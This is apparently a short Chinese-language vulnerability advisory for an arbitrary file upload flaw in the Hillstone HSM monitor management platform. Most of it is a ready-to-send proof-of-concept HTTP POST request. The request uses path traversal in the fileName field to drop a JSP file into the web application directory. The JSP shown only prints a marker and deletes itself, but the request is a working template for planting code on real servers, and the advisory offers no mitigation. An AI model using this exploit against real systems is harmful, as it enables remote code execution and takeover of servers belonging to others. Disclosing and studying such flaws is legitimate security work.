山石网科安全管理平台HSM monitor存在任意文件上传漏洞

日期: 2025-07-31 | 影响软件: 山石网科安全管理平台HSM monitor | POC: 已公开

漏洞描述

山石网科安全管理平台HSM monitor存在文件上传漏洞,攻击者可以通过该漏洞上传恶意文件执行恶意命令,进而控制整个服务器。

PoC代码

POST /ft//stoneos/monitor HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 497
Content-Type: multipart/form-data; boundary=6dd9d95ab6d2d40bcbcd85a259c29863

--6dd9d95ab6d2d40bcbcd85a259c29863
Content-Disposition: form-data; name="sn"

1
--6dd9d95ab6d2d40bcbcd85a259c29863
Content-Disposition: form-data; name="fileName"

../../../../hsmprogram/service/application/WebDaemon/errors/aa04414cc6.jsp
--6dd9d95ab6d2d40bcbcd85a259c29863
Content-Disposition: form-data; name="data"; filename="aa04414cc6.txt"

<% out.println("1");new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
--6dd9d95ab6d2d40bcbcd85a259c29863--